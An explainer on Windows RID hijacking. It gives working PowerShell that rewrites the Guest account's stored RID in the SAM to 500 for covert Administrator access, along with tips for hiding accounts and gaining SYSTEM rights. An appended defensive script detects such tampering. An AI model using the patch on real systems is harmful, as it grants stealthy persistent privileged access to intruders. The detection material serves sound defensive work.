A RID (Relative Identifier) is the last component of a Windows Security Identifier (SID) and uniquely identifies a user or group within the authority that issued it (the local machine or a domain). On a local machine the built-in Administrator account has RID 500, Guest has RID 501, and new local users are assigned RIDs starting at 1000. In a RID hijacking attack, the adversary rewrites the RID stored in the SAM record of a low-privilege account so that, at logon, Windows builds that account's access token with the SID of a high-value account, commonly the Administrator (RID 500). The result is stealthy, persistent privileged access without creating a new account or touching group memberships: the account keeps its original name and its original SAM subkey, only the RID inside its record has changed.

Example of file permissions when using the PsExec command (SYSTEM)
Outline of the technique:
1. Pick or create a low-privilege local account. A name ending in $ (for example admin$) keeps it out of standard listings such as net user.
2. Patch the F value at offset 0x30 in that user's SAM registry key (HKLM\SAM\SAM\Domains\Account\Users\<RID in hex>) so the stored RID matches 500 (Administrator).
3. HKLM\SAM\SAM is not accessible to Administrators by default, so either run the edit as SYSTEM or first grant access with regini.

The following PowerShell patches the Guest account (subkey 000001F5, RID 501) so that it logs on with RID 500:
# Run as SYSTEM (e.g. PsExec -s -i powershell.exe): HKLM\SAM\SAM is SYSTEM-only by default.
# The live SAM file (C:\Windows\System32\config\SAM) is locked by the kernel, so it cannot be
# mounted with reg load while Windows is running. To patch an offline copy instead, run
# reg load HKLM\TempSAM <path-to-SAM-copy>, point $key at HKLM:\TempSAM\SAM\Domains\Account\Users\000001F5,
# and finish with reg unload HKLM\TempSAM.
$key = 'HKLM:\SAM\SAM\Domains\Account\Users\000001F5'   # 0x1F5 = 501 = Guest
# Read the binary F value (account flags, timestamps and the RID)
$binary = [byte[]](Get-ItemProperty -Path $key -Name 'F' -ErrorAction Stop).F
# The RID is a 4-byte little-endian DWORD at offset 0x30; 500 = 0x000001F4 -> bytes F4 01 00 00
$ridBytes = [BitConverter]::GetBytes([uint32]500)
[Array]::Copy($ridBytes, 0, $binary, 0x30, 4)
# Write the patched blob back as REG_BINARY
Set-ItemProperty -Path $key -Name 'F' -Value $binary -Type Binary
Notes:
- F is a REG_BINARY blob holding account flags, logon timestamps and the RID. The RID is a 4-byte little-endian DWORD at offset 0x30, so 500 (0x1F4) is written as F4 01 00 00, not F4 00 00 00 (which would be RID 244). The subkey name (000001F5) is left as it is; only the RID inside F changes.
- HKLM\SAM\SAM is accessible only to SYSTEM by default; run the edit as SYSTEM (PsExec -s) or use regini to adjust the SAM key permissions, and script these steps.
- To verify, log on as the patched account and run whoami /user: the reported SID ends in -500. That mismatch between the RID in the subkey name and the RID stored in F is also what a defender should look for.
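The check described in the last note, as an added example that is not part of the original page: it walks every user subkey under the SAM Users key, reads the RID from the subkey name and the RID stored at F+0x30, and flags any account where the two differ. The function name Get-SamRidAudit and the -HiveRoot parameter are assumptions; the account name is recovered from the V blob using its standard layout (offset and length of the UTF-16LE name at V+0x0C and V+0x10, both relative to V+0xCC). It must run as SYSTEM on the live hive, or against an offline copy loaded with reg load.

```powershell
# Added example (not from the original page): audit the SAM for RID hijacking by comparing
# the RID encoded in each user subkey name with the RID stored in that key's F value.
# Run as SYSTEM (e.g. PsExec -s -i powershell.exe); HKLM\SAM\SAM is SYSTEM-only by default.
# For an offline copy: reg load HKLM\OfflineSAM <copy-of-SAM>, then -HiveRoot 'HKLM:\OfflineSAM\SAM'.
function Get-SamRidAudit {
    param(
        # Root of the loaded SAM hive (assumption: defaults to the live hive)
        [string]$HiveRoot = 'HKLM:\SAM\SAM'
    )
    $usersKey = "$HiveRoot\Domains\Account\Users"

    Get-ChildItem -Path $usersKey -ErrorAction Stop |
        # User subkeys are 8 hex digits (the RID); this skips the 'Names' subkey
        Where-Object { $_.PSChildName -match '^[0-9A-Fa-f]{8}$' } |
        ForEach-Object {
            $keyRid = [Convert]::ToUInt32($_.PSChildName, 16)   # RID from the subkey name
            $props  = Get-ItemProperty -Path $_.PSPath
            $f = [byte[]]$props.F
            $v = [byte[]]$props.V

            # RID the logon path actually uses: little-endian DWORD at F+0x30
            # (this is the field a RID hijack overwrites)
            $storedRid = [BitConverter]::ToUInt32($f, 0x30)

            # Account name from V: (offset, length) at V+0x0C / V+0x10, relative to V+0xCC, UTF-16LE
            $nameOff = [BitConverter]::ToUInt32($v, 0x0C) + 0xCC
            $nameLen = [BitConverter]::ToUInt32($v, 0x10)
            $name    = [Text.Encoding]::Unicode.GetString($v, $nameOff, $nameLen)

            [pscustomobject]@{
                Account   = $name
                KeyRid    = $keyRid
                StoredRid = $storedRid
                Hijacked  = ($keyRid -ne $storedRid)
            }
        }
}

# Usage: list every account, then show only the ones whose stored RID was tampered with
Get-SamRidAudit | Format-Table -AutoSize
Get-SamRidAudit | Where-Object Hijacked
```

On a clean system every row has KeyRid equal to StoredRid; a Guest row reporting KeyRid 501 and StoredRid 500 is the signature of the patch shown above. Because the subkey name cannot be changed without recreating the account, this comparison holds even if the attacker also renamed the account.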